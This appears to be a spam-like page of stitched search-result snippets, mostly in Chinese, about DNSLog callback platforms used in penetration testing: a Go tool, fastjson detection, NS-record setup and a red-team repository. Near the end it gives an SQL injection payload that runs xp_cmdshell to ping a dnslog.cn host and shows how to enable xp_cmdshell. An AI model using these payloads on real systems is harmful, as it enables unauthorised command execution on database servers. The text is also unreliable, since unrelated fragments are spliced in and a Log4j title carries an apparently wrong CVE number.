WebDNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具,自带界面. Contribute to lanyi1998/DNSlog-GO development by creating an account on GitHub. WebMar 25, 2024 · 0x01 背景 在渗透测试中遇到json数据一般都会测试下有没有反序列化。然而json库有fastjson,jackson,gson等等。怎么判断后端不是fastjson呢?这就需要构造特定的payload了。 昨天翻看fastjson源码时发现了一些可以构造dns解析且没在黑名单当中的类,于是顺手给官方提了下Issue。
CVE-2024-44228 - Log4j Zero Day Vulnerability
Web搭建并使用 DNSLog,你需要拥有一个域名如(a.com),还需要有一个公网 IP 地址(如:1.1.1.1) 修改 a.com 的 NS 记录为 NS1.vp*sip.NIP.IO NS2.vp*sip.NIP.IO 如 ns1.1.1.1.1.nip.io ns1.1.1.1.1.nip.io 本步骤中,需要在域名提供商提供的页面进行设置,部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。 WebMay 16, 2024 · 红队知识仓库 Awesome Redteam. 【免责声明】本仓库所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,否则后果自行承担。. 轻量化红队知识仓库,不定期更新。. markdown文档与Linux alias命令或Windows doskey命令联动,可实现终端快捷查询。. threadmng error
DNSlog平台搭建教程 - FreeBuf网络安全行业门户
WebSep 6, 2024 · Go Beyond DNS Logging. In addition to DNS log collection, be informed of other concepts including: Retention; Format – collect, parse, convert, and generate log data in various formats; Integrity – sending and receiving various types of encrypted log data, with checksumming generation and validation, write events to append-only database tables WebJul 23, 2024 · dnslog.link,命令执行漏洞的时候搞起ls命令记录起来很利索,比dnslog.cn快. http://admin.dnslog.link. ping 456.test.dnslog.link Web执行ping命令,dnslog平台查看一下有无回显 ' ;exec master..xp_cmdshell "ping ph3owt.dnslog.cn -n 2" --先不提出不出网这回事,xp_cmdshell是关闭的. 然而由于某不知名抗力,开启允许编辑高级选项和开启cmdshell竟然失败了. 开启xp_cmdshell EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; thread-mounted dial thermometers